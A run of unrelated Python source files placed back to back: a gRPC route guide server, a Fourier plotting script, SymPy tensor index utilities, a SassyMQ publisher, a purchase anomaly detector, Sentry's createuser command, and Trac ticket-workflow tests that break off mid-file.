# Copyright 2015 gRPC authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """The Python implementation of the gRPC route guide server.""" from concurrent import futures import time import math import logging import grpc import route_guide_pb2 import route_guide_pb2_grpc import route_guide_resources def get_feature(feature_db, point): """Returns Feature at given location or None.""" for feature in feature_db: if feature.location == point: return feature return None def get_distance(start, end): """Distance between two points.""" coord_factor = 10000000.0 lat_1 = start.latitude / coord_factor lat_2 = end.latitude / coord_factor lon_1 = start.longitude / coord_factor lon_2 = end.longitude / coord_factor lat_rad_1 = math.radians(lat_1) lat_rad_2 = math.radians(lat_2) delta_lat_rad = math.radians(lat_2 - lat_1) delta_lon_rad = math.radians(lon_2 - lon_1) # Formula is based on http://mathforum.org/library/drmath/view/51879.html a = (pow(math.sin(delta_lat_rad / 2), 2) + (math.cos(lat_rad_1) * math.cos(lat_rad_2) * pow(math.sin(delta_lon_rad / 2), 2))) c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a)) R = 6371000 # metres return R * c class RouteGuideServicer(route_guide_pb2_grpc.RouteGuideServicer): """Provides methods that implement functionality of route guide server.""" def __init__(self): self.db = route_guide_resources.read_route_guide_database() def GetFeature(self, request, context): feature = get_feature(self.db, request) if feature is None: return route_guide_pb2.Feature(name="", location=request) else: return feature def ListFeatures(self, request, context): left = min(request.lo.longitude, request.hi.longitude) right = max(request.lo.longitude, request.hi.longitude) top = max(request.lo.latitude, request.hi.latitude) bottom = min(request.lo.latitude, request.hi.latitude) for feature in self.db: if (feature.location.longitude >= left and feature.location.longitude <= right and feature.location.latitude >= bottom and feature.location.latitude <= top): yield feature def RecordRoute(self, request_iterator, context): point_count = 0 feature_count = 0 distance = 0.0 prev_point = None start_time = time.time() for point in request_iterator: point_count += 1 if get_feature(self.db, point): feature_count += 1 if prev_point: distance += get_distance(prev_point, point) prev_point = point elapsed_time = time.time() - start_time return route_guide_pb2.RouteSummary(point_count=point_count, feature_count=feature_count, distance=int(distance), elapsed_time=int(elapsed_time)) def RouteChat(self, request_iterator, context): prev_notes = [] for new_note in request_iterator: for prev_note in prev_notes: if prev_note.location == new_note.location: yield prev_note prev_notes.append(new_note) def serve(): server = grpc.server(futures.ThreadPoolExecutor(max_workers=10)) route_guide_pb2_grpc.add_RouteGuideServicer_to_server( RouteGuideServicer(), server) server.add_insecure_port('[::]:50051') server.start() server.wait_for_termination() if __name__ == '__main__': logging.basicConfig() serve()
#!/usr/bin/env python from __future__ import division import matplotlib as mpl mpl.use('Agg') import matplotlib.pyplot as plt plt.style.use('seaborn-paper') #plt.style.use('fivethirtyeight') #plt.style.use('bmh') import numpy as np from scipy import signal mpl.rcParams.update({'text.usetex': True, 'lines.linewidth': 1.5, 'font.size': 15, 'xtick.labelsize': 'small', 'ytick.labelsize': 'small', 'axes.labelsize': 'small', 'axes.grid': True, 'grid.alpha': 0.73, 'lines.markersize': 12, 'legend.borderpad': 0.2, 'legend.fancybox': True, 'legend.fontsize': 'x-small', 'legend.framealpha': 0.7, 'legend.handletextpad': 0.1, 'legend.labelspacing': 0.2, 'legend.loc': 'best', 'savefig.dpi': 100, 'pdf.compression': 9}) t = np.linspace(-0.25, 1.1, 333) def sumsines(t, n): g = 0 * np.ones_like(t) for p in range(1, n): #print p m = 2*p - 1 g += 4/(m * np.pi) * np.sin(m*2*np.pi * t) return g fig = plt.figure(3) plt.plot(t, signal.square(t*2*np.pi), lw=4, alpha=0.3) for k in (2, 3, 4, 5): #print('k = ' + str(k)) plt.plot(t, sumsines(t, k), alpha=0.5, rasterized=True, label='n = ' + str(k-1)) plt.xlabel('Distance [L]') #plt.ylabel('Magnitude Response [m/N]') plt.title('Fourier Series Approximation of Square Wave') plt.grid(True) plt.legend() plt.savefig("FourierSquareWave.pdf", bbox_inches='tight') # this is a plot with more Fourier components fig = plt.figure(33) plt.plot(t, signal.square(t*2*np.pi)) for k in (2, 3, 11, 51): #print('k = ' + str(k)) plt.plot(t, sumsines(t, k), alpha=0.5, rasterized=True, label='n = ' + str(k-1)) plt.xlabel('Distance [L]') #plt.ylabel('Magnitude Response [m/N]') plt.title('Fourier Series Approximation of Square Wave') plt.grid(True) plt.legend() plt.savefig("FourierSquareWave50.pdf", bbox_inches='tight') fig = plt.figure(39) m = np.arange(1, 20) A = 4/(m * np.pi) plt.semilogy(m, A, alpha=0.5, marker='o', rasterized=True) plt.xlabel('1/Wavelength [1/L]') plt.xticks(m) plt.ylabel('$|A|$') plt.title('Spectrum of Square Wave') plt.grid(True) #plt.legend() plt.savefig("FourierSquareWavePSD.pdf", bbox_inches='tight')
"""Module with functions operating on IndexedBase, Indexed and Idx objects - Check shape conformance - Determine indices in resulting expression etc. Methods in this module could be implemented by calling methods on Expr objects instead. When things stabilize this could be a useful refactoring. """ from __future__ import print_function, division from sympy.core.function import Function from sympy.functions import exp, Piecewise from sympy.tensor.indexed import Idx, Indexed from sympy.core.compatibility import reduce class IndexConformanceException(Exception): pass def _remove_repeated(inds): """Removes repeated objects from sequences Returns a set of the unique objects and a tuple of all that have been removed. >>> from sympy.tensor.index_methods import _remove_repeated >>> l1 = [1, 2, 3, 2] >>> _remove_repeated(l1) ({1, 3}, (2,)) """ sum_index = {} for i in inds: if i in sum_index: sum_index[i] += 1 else: sum_index[i] = 0 inds = [x for x in inds if not sum_index[x]] return set(inds), tuple([ i for i in sum_index if sum_index[i] ]) def _get_indices_Mul(expr, return_dummies=False): """Determine the outer indices of a Mul object. >>> from sympy.tensor.index_methods import _get_indices_Mul >>> from sympy.tensor.indexed import IndexedBase, Idx >>> i, j, k = map(Idx, ['i', 'j', 'k']) >>> x = IndexedBase('x') >>> y = IndexedBase('y') >>> _get_indices_Mul(x[i, k]*y[j, k]) ({i, j}, {}) >>> _get_indices_Mul(x[i, k]*y[j, k], return_dummies=True) ({i, j}, {}, (k,)) """ inds = list(map(get_indices, expr.args)) inds, syms = list(zip(*inds)) inds = list(map(list, inds)) inds = list(reduce(lambda x, y: x + y, inds)) inds, dummies = _remove_repeated(inds) symmetry = {} for s in syms: for pair in s: if pair in symmetry: symmetry[pair] *= s[pair] else: symmetry[pair] = s[pair] if return_dummies: return inds, symmetry, dummies else: return inds, symmetry def _get_indices_Pow(expr): """Determine outer indices of a power or an exponential. A power is considered a universal function, so that the indices of a Pow is just the collection of indices present in the expression. This may be viewed as a bit inconsistent in the special case: x[i]**2 = x[i]*x[i] (1) The above expression could have been interpreted as the contraction of x[i] with itself, but we choose instead to interpret it as a function lambda y: y**2 applied to each element of x (a universal function in numpy terms). In order to allow an interpretation of (1) as a contraction, we need contravariant and covariant Idx subclasses. (FIXME: this is not yet implemented) Expressions in the base or exponent are subject to contraction as usual, but an index that is present in the exponent, will not be considered contractable with its own base. Note however, that indices in the same exponent can be contracted with each other. >>> from sympy.tensor.index_methods import _get_indices_Pow >>> from sympy import Pow, exp, IndexedBase, Idx >>> A = IndexedBase('A') >>> x = IndexedBase('x') >>> i, j, k = map(Idx, ['i', 'j', 'k']) >>> _get_indices_Pow(exp(A[i, j]*x[j])) ({i}, {}) >>> _get_indices_Pow(Pow(x[i], x[i])) ({i}, {}) >>> _get_indices_Pow(Pow(A[i, j]*x[j], x[i])) ({i}, {}) """ base, exp = expr.as_base_exp() binds, bsyms = get_indices(base) einds, esyms = get_indices(exp) inds = binds | einds # FIXME: symmetries from power needs to check special cases, else nothing symmetries = {} return inds, symmetries def _get_indices_Add(expr): """Determine outer indices of an Add object. In a sum, each term must have the same set of outer indices. A valid expression could be x(i)*y(j) - x(j)*y(i) But we do not allow expressions like: x(i)*y(j) - z(j)*z(j) FIXME: Add support for Numpy broadcasting >>> from sympy.tensor.index_methods import _get_indices_Add >>> from sympy.tensor.indexed import IndexedBase, Idx >>> i, j, k = map(Idx, ['i', 'j', 'k']) >>> x = IndexedBase('x') >>> y = IndexedBase('y') >>> _get_indices_Add(x[i] + x[k]*y[i, k]) ({i}, {}) """ inds = list(map(get_indices, expr.args)) inds, syms = list(zip(*inds)) # allow broadcast of scalars non_scalars = [x for x in inds if x != set()] if not non_scalars: return set(), {} if not all([x == non_scalars[0] for x in non_scalars[1:]]): raise IndexConformanceException("Indices are not consistent: %s" % expr) if not reduce(lambda x, y: x != y or y, syms): symmetries = syms[0] else: # FIXME: search for symmetries symmetries = {} return non_scalars[0], symmetries def get_indices(expr): """Determine the outer indices of expression ``expr`` By *outer* we mean indices that are not summation indices. Returns a set and a dict. The set contains outer indices and the dict contains information about index symmetries. Examples ======== >>> from sympy.tensor.index_methods import get_indices >>> from sympy import symbols >>> from sympy.tensor import IndexedBase, Idx >>> x, y, A = map(IndexedBase, ['x', 'y', 'A']) >>> i, j, a, z = symbols('i j a z', integer=True) The indices of the total expression is determined, Repeated indices imply a summation, for instance the trace of a matrix A: >>> get_indices(A[i, i]) (set(), {}) In the case of many terms, the terms are required to have identical outer indices. Else an IndexConformanceException is raised. >>> get_indices(x[i] + A[i, j]*y[j]) ({i}, {}) :Exceptions: An IndexConformanceException means that the terms ar not compatible, e.g. >>> get_indices(x[i] + y[j]) #doctest: +SKIP (...) IndexConformanceException: Indices are not consistent: x(i) + y(j) .. warning:: The concept of *outer* indices applies recursively, starting on the deepest level. This implies that dummies inside parenthesis are assumed to be summed first, so that the following expression is handled gracefully: >>> get_indices((x[i] + A[i, j]*y[j])*x[j]) ({i, j}, {}) This is correct and may appear convenient, but you need to be careful with this as SymPy will happily .expand() the product, if requested. The resulting expression would mix the outer ``j`` with the dummies inside the parenthesis, which makes it a different expression. To be on the safe side, it is best to avoid such ambiguities by using unique indices for all contractions that should be held separate. """ # We call ourself recursively to determine indices of sub expressions. # break recursion if isinstance(expr, Indexed): c = expr.indices inds, dummies = _remove_repeated(c) return inds, {} elif expr is None: return set(), {} elif isinstance(expr, Idx): return {expr}, {} elif expr.is_Atom: return set(), {} # recurse via specialized functions else: if expr.is_Mul: return _get_indices_Mul(expr) elif expr.is_Add: return _get_indices_Add(expr) elif expr.is_Pow or isinstance(expr, exp): return _get_indices_Pow(expr) elif isinstance(expr, Piecewise): # FIXME: No support for Piecewise yet return set(), {} elif isinstance(expr, Function): # Support ufunc like behaviour by returning indices from arguments. # Functions do not interpret repeated indices across argumnts # as summation ind0 = set() for arg in expr.args: ind, sym = get_indices(arg) ind0 |= ind return ind0, sym # this test is expensive, so it should be at the end elif not expr.has(Indexed): return set(), {} raise NotImplementedError( "FIXME: No specialized handling of type %s" % type(expr)) def get_contraction_structure(expr): """Determine dummy indices of ``expr`` and describe its structure By *dummy* we mean indices that are summation indices. The stucture of the expression is determined and described as follows: 1) A conforming summation of Indexed objects is described with a dict where the keys are summation indices and the corresponding values are sets containing all terms for which the summation applies. All Add objects in the SymPy expression tree are described like this. 2) For all nodes in the SymPy expression tree that are *not* of type Add, the following applies: If a node discovers contractions in one of its arguments, the node itself will be stored as a key in the dict. For that key, the corresponding value is a list of dicts, each of which is the result of a recursive call to get_contraction_structure(). The list contains only dicts for the non-trivial deeper contractions, ommitting dicts with None as the one and only key. .. Note:: The presence of expressions among the dictinary keys indicates multiple levels of index contractions. A nested dict displays nested contractions and may itself contain dicts from a deeper level. In practical calculations the summation in the deepest nested level must be calculated first so that the outer expression can access the resulting indexed object. Examples ======== >>> from sympy.tensor.index_methods import get_contraction_structure >>> from sympy import symbols, default_sort_key >>> from sympy.tensor import IndexedBase, Idx >>> x, y, A = map(IndexedBase, ['x', 'y', 'A']) >>> i, j, k, l = map(Idx, ['i', 'j', 'k', 'l']) >>> get_contraction_structure(x[i]*y[i] + A[j, j]) {(i,): {x[i]*y[i]}, (j,): {A[j, j]}} >>> get_contraction_structure(x[i]*y[j]) {None: {x[i]*y[j]}} A multiplication of contracted factors results in nested dicts representing the internal contractions. >>> d = get_contraction_structure(x[i, i]*y[j, j]) >>> sorted(d.keys(), key=default_sort_key) [None, x[i, i]*y[j, j]] In this case, the product has no contractions: >>> d[None] {x[i, i]*y[j, j]} Factors are contracted "first": >>> sorted(d[x[i, i]*y[j, j]], key=default_sort_key) [{(i,): {x[i, i]}}, {(j,): {y[j, j]}}] A parenthesized Add object is also returned as a nested dictionary. The term containing the parenthesis is a Mul with a contraction among the arguments, so it will be found as a key in the result. It stores the dictionary resulting from a recursive call on the Add expression. >>> d = get_contraction_structure(x[i]*(y[i] + A[i, j]*x[j])) >>> sorted(d.keys(), key=default_sort_key) [(A[i, j]*x[j] + y[i])*x[i], (i,)] >>> d[(i,)] {(A[i, j]*x[j] + y[i])*x[i]} >>> d[x[i]*(A[i, j]*x[j] + y[i])] [{None: {y[i]}, (j,): {A[i, j]*x[j]}}] Powers with contractions in either base or exponent will also be found as keys in the dictionary, mapping to a list of results from recursive calls: >>> d = get_contraction_structure(A[j, j]**A[i, i]) >>> d[None] {A[j, j]**A[i, i]} >>> nested_contractions = d[A[j, j]**A[i, i]] >>> nested_contractions[0] {(j,): {A[j, j]}} >>> nested_contractions[1] {(i,): {A[i, i]}} The description of the contraction structure may appear complicated when represented with a string in the above examples, but it is easy to iterate over: >>> from sympy import Expr >>> for key in d: ... if isinstance(key, Expr): ... continue ... for term in d[key]: ... if term in d: ... # treat deepest contraction first ... pass ... # treat outermost contactions here """ # We call ourself recursively to inspect sub expressions. if isinstance(expr, Indexed): junk, key = _remove_repeated(expr.indices) return {key or None: {expr}} elif expr.is_Atom: return {None: {expr}} elif expr.is_Mul: junk, junk, key = _get_indices_Mul(expr, return_dummies=True) result = {key or None: {expr}} # recurse on every factor nested = [] for fac in expr.args: facd = get_contraction_structure(fac) if not (None in facd and len(facd) == 1): nested.append(facd) if nested: result[expr] = nested return result elif expr.is_Pow or isinstance(expr, exp): # recurse in base and exp separately. If either has internal # contractions we must include ourselves as a key in the returned dict b, e = expr.as_base_exp() dbase = get_contraction_structure(b) dexp = get_contraction_structure(e) dicts = [] for d in dbase, dexp: if not (None in d and len(d) == 1): dicts.append(d) result = {None: {expr}} if dicts: result[expr] = dicts return result elif expr.is_Add: # Note: we just collect all terms with identical summation indices, We # do nothing to identify equivalent terms here, as this would require # substitutions or pattern matching in expressions of unknown # complexity. result = {} for term in expr.args: # recurse on every term d = get_contraction_structure(term) for key in d: if key in result: result[key] |= d[key] else: result[key] = d[key] return result elif isinstance(expr, Piecewise): # FIXME: No support for Piecewise yet return {None: expr} elif isinstance(expr, Function): # Collect non-trivial contraction structures in each argument # We do not report repeated indices in separate arguments as a # contraction deeplist = [] for arg in expr.args: deep = get_contraction_structure(arg) if not (None in deep and len(deep) == 1): deeplist.append(deep) d = {None: {expr}} if deeplist: d[expr] = deeplist return d # this test is expensive, so it should be at the end elif not expr.has(Indexed): return {None: {expr}} raise NotImplementedError( "FIXME: No specialized handling of type %s" % type(expr))
from SassyMQ.OSTL.Lexicon import * from SassyMQ.OSTL.CommonClasses.BaseClasses import * from SassyMQ.OSTL.CommonClasses.SMQActorBase import * from json import JSONEncoder import sys import traceback class SMQPublicBase(SMQActorBase): def __init__(self, isAutoConnect = True): super(SMQPublicBase, self).__init__("public.all", isAutoConnect) # "OpenSourceTools" - OSTL def CheckRouting(self, message_frame, header_frame, body): payload = self.PayloadFromMsg(message_frame, header_frame, body) print("CHECKING: " + message_frame.routing_key) # ACTOR CAN SAY: def PublicCreateSMQProjectNoPayload(self): self.PublicCreateSMQProject(self.CreatePayload()) def PublicCreateSMQProjectString(self, content): payload = self.CreatePayload() payload.Content = content self.PublicCreateSMQProject(payload) def PublicCreateSMQProject(self, payload): if self.IsDebugMode: print("Create S M Q Project - ") print("payload: " + payload) term = payload.LexiconTerm = Lexicon.TermsByRoutingKey['host.general.public.createsmqproject']; self.RMQChannel.basic_publish(exchange=term.Sender + 'mic', routing_key=term.RoutingKey, body=payload.toJSON())
import sys import numpy as np import pandas as pd import networkx as nx import json import sys def main(argv): # ## Step1: build the initial state of the entire user network, as well as the purchae history of the users # Input: sample_dataset/batch_log.json #batchlogfile = 'sample_dataset/batch_log.json' batchlogfile = sys.argv[1] df_batch = pd.read_json(batchlogfile, lines=True) index_purchase = ['event_type','id','timestamp','amount'] index_friend = ['event_type','id1','id2','timestamp'] # Read D and T df_DT=df_batch[df_batch['D'].notnull()] df_DT=df_DT[['D','T']] D = df_DT.values[0][0] T = df_DT.values[0][1] # check D and T values if D < 1: print('Program terminated because of D < 1') sys.exit() if T < 2: print('Program terminated because of T < 2') sys.exit() df_purchase = df_batch[df_batch['event_type']=='purchase'] df_purchase = df_purchase[index_purchase] df_purchase = df_purchase.dropna(how='any') # If sort on the timestamp is needed, commentout the following line # df_purchase = df_purchase.sort_values('timestamp') #df_purchase.shape df_friend=df_batch[(df_batch['event_type']=='befriend') | (df_batch['event_type']=='unfriend')] df_friend=df_friend[index_friend] df_friend=df_friend.dropna(how='any') # If sort on the timestamp is needed, commentout the following line #df_friend=df_friend.sort_values('timestamp') #df_friend.shape # Define a network G G = nx.Graph() idlist = set(df_purchase.id.tolist()) G.add_nodes_from(idlist) #len(list(G.nodes())) # Define a function Add_edges to add edges to G def Add_edges(data): for row in data.itertuples(): id10 = row.id1 id20 = row.id2 event_type0 = row.event_type if event_type0 == 'befriend': G.add_edge(id10,id20) if event_type0 == 'unfriend': if G.has_edge(id10,id20): G.remove_edge(id10,id20) Add_edges(df_friend) #G.number_of_nodes() #G.number_of_edges() # define a function to calcualte the mean and sd for userid's network def Get_Mean_SD(userid): Nodes = list(nx.ego_graph(G, userid, D, center=False)) df_Nodes = df_purchase.loc[df_purchase['id'].isin(Nodes)] if len(df_Nodes) >= 2: if len(df_Nodes) > T: df_Nodes = df_Nodes.sort_values('timestamp').iloc[-int(T):] #df_Nodes.shape #the std from pd is different from np; np is correct #mean = df_Nodes.amount.mean() #sd = df_Nodes.amount.std() mean = np.mean(df_Nodes['amount']) sd = np.std(df_Nodes['amount']) mean = float("{0:.2f}".format(mean)) sd = float("{0:.2f}".format(sd)) else: mean=np.nan sd=np.nan return mean, sd #Get_Mean_SD(0.0) # read in the stream_log.json #streamlogfile = 'sample_dataset/stream_log.json' streamlogfile = sys.argv[2] df_stream = pd.read_json(streamlogfile, lines=True) # If sort on the timestamp is needed, commentout the following line #df_stream = df_stream.sort_values('timestamp') # open output file flagged_purchases.json #flaggedfile = 'log_output/flagged_purchases.json' flaggedfile = sys.argv[3] f = open(flaggedfile, 'w') # Determine whether a purchase is anomalous; update purchase history; update social network for i in range(0, len(df_stream)): datai = df_stream.iloc[i] event_type = datai['event_type'] if (event_type == 'purchase') & (not datai[index_purchase].isnull().any()): # update purchase history df_purchase = df_purchase.append(datai[index_purchase]) timestamp = datai['timestamp'] timestamp = str(timestamp) userid = datai['id'] if (not G.has_node(userid)): G.add_node(userid) amount = datai['amount'] mean, sd = Get_Mean_SD(userid) if mean != np.nan: mean_3sd = mean + (3*sd) if amount > mean_3sd: f.write('{{"event_type":"{0:s}", "timestamp":"{1:s}", "id": "{2:.0f}", "amount": "{3:.2f}", "mean": "{4:.2f}", "sd": "{5:.2f}"}}\n'.format(event_type, timestamp, userid, amount, mean, sd)) # update social network if (event_type == 'befriend') & (not datai[index_friend].isnull().any()): df_friend=df_friend.append(datai[index_friend]) id1 = datai['id1'] id2 = datai['id2'] G.add_edge(id1,id2) if (event_type == 'unfriend') & (not datai[index_friend].isnull().any()): df_friend=df_friend.append(datai[index_friend]) id1 = datai['id1'] id2 = datai['id2'] if G.has_edge(id1,id2): G.remove_edge(id1,id2) f.close() if __name__ == "__main__": main(sys.argv)
""" sentry.management.commands.createuser ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ :copyright: (c) 2012 by the Sentry Team, see AUTHORS for more details. :license: BSD, see LICENSE for more details. """ from __future__ import absolute_import import getpass import sys from django.conf import settings from django.core.exceptions import ValidationError from django.core.management.base import BaseCommand, CommandError, make_option from sentry.models import ( Organization, OrganizationMember, OrganizationMemberType, User ) class Command(BaseCommand): help = 'Creates a new user' option_list = BaseCommand.option_list + ( make_option('--email', dest='email'), make_option('--superuser', dest='is_superuser', action='store_true', default=None), make_option('--password', dest='password', default=None), make_option('--no-superuser', dest='is_superuser', action='store_false', default=None), make_option('--no-password', dest='nopassword', action='store_true', default=False), make_option('--no-input', dest='noinput', action='store_true', default=False), ) def _get_field(self, field_name): return User._meta.get_field(field_name) def get_email(self): raw_value = raw_input('Email: ') if not raw_value: raise CommandError('Invalid email address: This field cannot be blank') field = self._get_field('email') try: return field.clean(raw_value, None) except ValidationError as e: raise CommandError('Invalid email address: %s' % '; '.join(e.messages)) def get_password(self): raw_value = getpass.getpass() field = self._get_field('password') try: return field.clean(raw_value, None) except ValidationError as e: raise CommandError('Invalid password: %s' % '; '.join(e.messages)) def get_superuser(self): if raw_input('Should this user be a superuser? [yN] ').lower() == 'y': return True return False def handle(self, **options): email = options['email'] is_superuser = options['is_superuser'] password = options['password'] if not options['noinput']: try: if not email: email = self.get_email() if not (password or options['nopassword']): password = self.get_password() if is_superuser is None: is_superuser = self.get_superuser() except KeyboardInterrupt: self.stderr.write("\nOperation cancelled.") sys.exit(1) if not email: raise CommandError('Invalid or missing email address') if not options['nopassword'] and not password: raise CommandError('No password set and --no-password not passed') user = User( email=email, username=email, is_superuser=is_superuser, is_staff=is_superuser, is_active=True, ) if password: user.set_password(password) user.save() self.stdout.write('User created: %s' % (email,)) # TODO(dcramer): kill this when we improve flows if settings.SENTRY_SINGLE_ORGANIZATION: org = Organization.get_default() OrganizationMember.objects.create( organization=org, user=user, type=OrganizationMemberType.OWNER, has_global_access=user.is_superuser, ) self.stdout.write('Added to organization: %s' % (org.slug,))
#!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright (C) 2008-2015 Edgewall Software # All rights reserved. # # This software is licensed as described in the file COPYING, which # you should have received as part of this distribution. The terms # are also available at http://trac.edgewall.org/wiki/TracLicense. # # This software consists of voluntary contributions made by many # individuals. For the exact contribution history, see the revision # history and logs, available at http://trac.edgewall.org/log/. import unittest import trac.tests.compat from trac.tests.functional import FunctionalTwillTestCaseSetup, tc class SetOwnerOperation(FunctionalTwillTestCaseSetup): def setUp(self): super(SetOwnerOperation, self).setUp() self.env = self._testenv.get_trac_environment() self.reassign_operations = self.env.config.get('ticket-workflow', 'reassign.operations') self.env.config.set('ticket-workflow', 'reassign.operations', 'set_owner') self.restrict_owner = self.env.config.get('ticket', 'restrict_owner') self.env.config.set('ticket', 'restrict_owner', False) self.env.config.save() def tearDown(self): super(SetOwnerOperation, self).tearDown() self.env.config.set('ticket-workflow', 'reassign.operations', self.reassign_operations) self.env.config.set('ticket', 'restrict_owner', self.restrict_owner) self.env.config.save() def test_default(self): """When using the workflow operation `set_owner`, the assign-to field will default to the currently requesting username. """ ticket_id = self._tester.create_ticket(self.__class__.__name__, info={'owner': 'lammy'}) self._tester.go_to_ticket(ticket_id) tc.find('The owner will be changed from ' '<span class="trac-author">lammy</span>') tc.find('<input type="text" name="action_reassign_reassign_owner" ' 'value="admin" id="action_reassign_reassign_owner" />') def test_restrict_owner_not_known_user(self): """When using the workflow operation `set_owner` with restrict_owner=true, the assign-to dropdown menu will not contain the requesting user, if the requesting user is not a known user. """ try: ticket_id = self._tester.create_ticket(self.__class__.__name__, info={'owner': 'lammy'}) self.env.config.set('ticket', 'restrict_owner', True) self.env.config.save() self._tester.logout() self._testenv.grant_perm('anonymous', 'TICKET_ADMIN') self._tester.go_to_ticket(ticket_id) tc.find('The owner will be changed from ' '<span class="trac-author">lammy</span>') tc.notfind('<option value="anonymous" selected="selected">' 'anonymous</option>') finally: self._testenv.revoke_perm('anonymous', 'TICKET_ADMIN') self._tester.login('admin') def test_set_owner(self): """When using the workflow operation `set_owner` with a specific list of available owners, the assign-to field will only contain that list of owners. The requesting user will not be added to the list, and the current ticket owner will not be added to the list. """ try: ticket_id = self._tester.create_ticket(self.__class__.__name__, info={'owner': 'lammy'}) self.env.config.set('ticket-workflow', 'reassign.set_owner', "alice,bill") self.env.config.save() self._tester.go_to_ticket(ticket_id) tc.find('The owner will be changed from ' '<span class="trac-author">lammy</span>') tc.notfind('<input type="text" name="action_reassign_reassign_owner" ' 'value="admin" id="action_reassign_reassign_owner" />') tc.notfind('<option selected="selected" value="admin">admin</option>') tc.notfind('<option value="admin">admin</option>') tc.notfind('<input type="text" name="action_reassign_reassign_owner" ' 'value="lammy" id="action_reassign_reassign_owner" />') tc.notfind('<option selected="selected" value="lammy">lammy</option>') tc.notfind('<option value="lammy">lammy</option>') finally: self.env.config.remove('ticket-workflow', 'reassign.set_owner') def test_set_owner_one_choice(self): """When using the workflow operation `set_owner` with a specific single-element list of available owners, the assign-to field will not give the end user any choices at all. """ try: ticket_id = self._tester.create_ticket(self.__class__.__name__, info={'owner': 'lammy'}) self.env.config.set('ticket-workflow', 'reassign.set_owner', "alice") self.env.config.save() self._tester.go_to_ticket(ticket_id) tc.notfind('<select name="action_reassign_reassign_owner"') tc.find('<input type="hidden" ' 'name="action_reassign_reassign_owner" ' 'value="alice" id="action_reassign_reassign_owner" />') tc.find('The owner will be changed from ' '<span class="trac-author">lammy</span> to ' '<span class="trac-author">alice</span>') tc.notfind('<input type="text" name="action_reassign_reassign_owner" ' 'value="admin" id="action_reassign_reassign_owner" />') tc.notfind('<option selected="selected" value="admin">admin</option>') tc.notfind('<option value="admin">admin</option>') tc.notfind('<input type="text" name="action_reassign_reassign_owner" ' 'value="lammy" id="action_reassign_reassign_owner" />') tc.notfind('<option selected="selected" value="lammy">lammy</option>') tc.notfind('<option value="lammy">lammy</option>') finally: self.env.config.remove('ticket-workflow', 'reassign.set_owner') class MaySetOwnerOperationRestrictOwnerFalse(FunctionalTwillTestCaseSetup): """Test cases for may_set_owner operation with `[ticket] restrict_owner = False` http://trac.edgewall.org/ticket/10018 """ def setUp(self): super(MaySetOwnerOperationRestrictOwnerFalse, self).setUp() self.env = self._testenv.get_trac_environment() self.reassign_operations = self.env.config.get('ticket-workflow', 'reassign.operations') self.env.config.set('ticket-workflow', 'reassign.operations', 'may_set_owner') self.restrict_owner = self.env.config.get('ticket', 'restrict_owner') self.env.config.set('ticket', 'restrict_owner', False) self.env.config.save() def tearDown(self): super(MaySetOwnerOperationRestrictOwnerFalse, self).tearDown() self.env.config.set('ticket-workflow', 'reassign.operations', self.reassign_operations) self.env.config.set('ticket', 'restrict_owner', self.restrict_owner) self.env.config.save() def test_default(self): """The assign-to field will default to the ticket's current owner. """ ticket_id = self._tester.create_ticket(self.__class__.__name__, info={'owner': 'lammy'}) self._tester.go_to_ticket(ticket_id) tc.find('The owner will be changed from ' '<span class="trac-author">lammy</span>') tc.find('<input type="text" name="action_reassign_reassign_owner"' ' value="lammy" id="action_reassign_reassign_owner" />') def test_default_no_owner(self): """The assign-to field will default to a blank field if the ticket currently has no owner. """ ticket_id = self._tester.create_ticket(self.__class__.__name__, info={'owner': ''}) self._tester.go_to_ticket(ticket_id) tc.find("The ticket will remain with no owner.") tc.find('The owner will be changed from ' '<span class="trac-author-none">\(none\)</span>') tc.find('<input type="text" name="action_reassign_reassign_owner"' ' id="action_reassign_reassign_owner" />') def test_default_restrict_owner(self): """The assign-to field will default to the ticket's current owner even if the current owner is not otherwise known to the Trac environment.""" ticket_id = self._tester.create_ticket(self.__class__.__name__, info={'owner': 'lammy'}) self.env.config.set('ticket', 'restrict_owner', True) self.env.config.save() self._tester.go_to_ticket(ticket_id) tc.find('The owner will be changed from ' '<span class="trac-author">lammy</span>') tc.find('<option selected="selected" value="lammy">' 'lammy</option>') known_usernames = [u[0] for u in self.env.get_known_users()] self.assertNotIn('lammy', known_usernames) def test_set_owner(self): """When using the workflow operation `may_set_owner` with a specific list of available owners, the assign-to field will only contain that list of owners. The requesting user will not be added to the list. But the current ticket owner will be added to the list, and will be the default choice. """ try: ticket_id = self._tester.create_ticket(self.__class__.__name__, info={'owner': 'lammy'}) self.env.config.set('ticket-workflow', 'reassign.set_owner', "alice,bill") self.env.config.save() self._tester.go_to_ticket(ticket_id) tc.find('The owner will be changed from ' '<span class="trac-author">lammy</span>') tc.notfind('<input type="text" name="action_reassign_reassign_owner" ' 'value="admin" id="action_reassign_reassign_owner" />') tc.find('<option selected="selected" value="lammy">lammy</option>') tc.find('<option value="alice">alice</option>') tc.find('<option value="bill">bill</option>') tc.notfind('<input type="text" name="action_reassign_reassign_owner" ' 'value="admin" id="action_reassign_reassign_owner" />') tc.notfind('<option selected="selected" value="admin">admin</option>') tc.notfind('<option value="admin">admin</option>') finally: self.env.config.remove('ticket-workflow', 'reassign.set_owner') def test_set_owner_one_choice(self): """When using the workflow operation `may_set_owner` with a specific single-element list of available owners, the assign-to field will become a dropdown with two options if the current owner is not the single specified option. It will be a text field, and will not give the end user any choices at all, if and only if the current owner is the single specified option. """ try: ticket_id = self._tester.create_ticket(self.__class__.__name__, info={'owner': 'lammy'}) self.env.config.set('ticket-workflow', 'reassign.set_owner', "alice") self.env.config.save() self._tester.go_to_ticket(ticket_id) tc.find('The owner will be changed from ' '<span class="trac-author">lammy</span>') tc.find('<select name="action_reassign_reassign_owner"') tc.notfind('<input type="hidden" ' 'name="action_reassign_reassign_owner" ' 'value="alice" id="action_reassign_reassign_owner" />') tc.notfind('The owner will be changed from ' '<span class="trac-author">lammy<span> to ' '<span class="trac-author">alice</span>') tc.find('<option selected="selected" value="lammy">lammy</option>') tc.find('<option value="alice">alice</option>') self.env.config.set('ticket-workflow', 'reassign.set_owner', "lammy") self.env.config.save() self._tester.go_to_ticket(ticket_id) tc.notfind('<select 